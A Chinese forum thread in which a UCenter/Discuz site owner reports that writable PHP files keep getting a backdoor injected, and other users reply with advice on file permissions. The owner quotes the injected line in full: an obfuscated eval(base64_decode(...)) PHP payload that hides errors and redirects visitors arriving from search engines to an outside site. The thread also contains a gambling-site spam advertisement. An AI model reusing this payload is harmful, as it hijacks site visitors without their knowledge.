UCenter太容易被挂后门程序了

我知道这和文件以及目录的读写权限有关，但是UCenter里面所有文件90%必须可改写，否则访问任何页面都提示错误。比如那个control目录，我设置为可写入还不够，里面所有php文件都必须可写（777），否则打不开UC控制台的登录界面，而实际即使更新缓存，那些文件的修改日期都不会改变，根本不会去写它们，可见是你们判断文件是否可写时的问题。
现在问题来了，UCenter下面只要是可写的php文件，不是缓存文件都被挂了后门程序，每次除去不久就再次改写，在文件开头添加了一段这样的代码：

1. eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgewppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaXNmYXJ0LmZhcnRpdC5jb20vIik7CmV4aXQoKTsKfQp9Cn0KfQp9"));

复制代码

请官方得以重视，其实对于小站，UCenter完全可以不需要，可是你们一定要整合，不提供单独的Discuz版本，那么至少要保证UCenter的安全性吧。

UC 没必要我觉得

彩票百乐门庆六周年之际,凡充值满足200元以上（含）的充值，即按充值额赠送10%的彩金。
网址: www.cpblm.com

UCenter完全可以不需要，可是你们一定要整合

不应该吧，可写的不能有执行权限，有执行权限的不可写。

我这儿uc_client设置目录为750，文件为640. uc_client/data是770. 并且这些个7并不是给跑php/nginx进程的属主的。也就是说webserver程序是无法新建目录文件的（除了缓存data目录）。

设置为777那是解决不了问题而偷懒的做法。我这儿设置uc中目录文件90%是不可写的。

觉得，应该考虑一下安全性，还有就是怎样把论坛盘活！www.simcis.com

qunfeng 发表于 2012-8-3 11:34
觉得，应该考虑一下安全性，还有就是怎样把论坛盘活！www.simcis.com

安全性那是OS和webserver层面的，dz管不了那么多

人品大爆发，看看能不能留名首页







色卡